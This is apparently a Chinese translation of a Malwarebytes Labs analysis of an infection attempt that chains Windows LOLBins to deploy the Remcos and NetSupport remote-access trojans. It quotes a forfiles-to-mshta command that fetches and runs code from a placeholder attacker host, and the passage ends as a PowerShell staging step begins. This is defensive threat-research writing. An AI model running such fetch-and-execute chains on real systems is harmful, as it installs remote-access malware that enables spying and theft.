详细内容或原文请订阅后点击阅览
你可以使用太多的 LOLBins 来删除一些 RAT 吗?
尝试在系统上删除两个 RAT 使用了各种各样的合法 Windows 工具。
来源:Malwarebytes Labs 博客最近,我们的团队遇到了一次引人注目的感染尝试,不是因为其复杂程度,而是因为攻击者将“靠土地为生”的方式发挥到了极致。
最终目标是部署 Remcos(一种远程访问木马 (RAT))和 NetSupport Manager(一种经常被滥用为 RAT 的合法远程管理工具)。攻击者采取的路线是名副其实的 Windows 内置实用程序——称为 LOLBins(Living Off the Land Binaries)。
Remcos 和 NetSupport 都是被广泛滥用的远程访问工具,使攻击者能够广泛控制受感染的系统,并且通常通过多阶段网络钓鱼或感染链进行传播。
Remcos(Remote Control & Surveillance 的缩写)作为合法的 Windows 远程管理和监控工具出售,但被网络犯罪分子广泛使用。安装后,它为攻击者提供了完整的远程桌面访问、文件系统控制、命令执行、键盘记录、剪贴板监控、持久性选项以及用于横向移动的隧道或代理功能。
NetSupport Manager 是一款合法的远程支持产品,当攻击者悄悄安装并配置它以进行未经授权的访问时,该产品将成为“NetSupport RAT”。
让我们逐步了解一下这种攻击是如何展开的,一次一个本机命令。
第 1 阶段:微妙的初始访问
攻击以一个看似奇怪的命令开始:
C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta http://[attacker-ip]/web"
乍一看,您可能会想:为什么不直接运行 mshta.exe 呢?答案在于防御规避。
通过引入 forfiles.exe(一种用于在批量文件上运行命令的合法工具),攻击者将水搅浑了。这使得安全工具更难发现执行路径。从本质上讲,一个受信任的程序会悄悄启动另一个程序,形成一条不太可能触发警报的链。
第 2 阶段:无文件下载和暂存
powershell.exe -NoProfile -Command
mkdir "<随机>";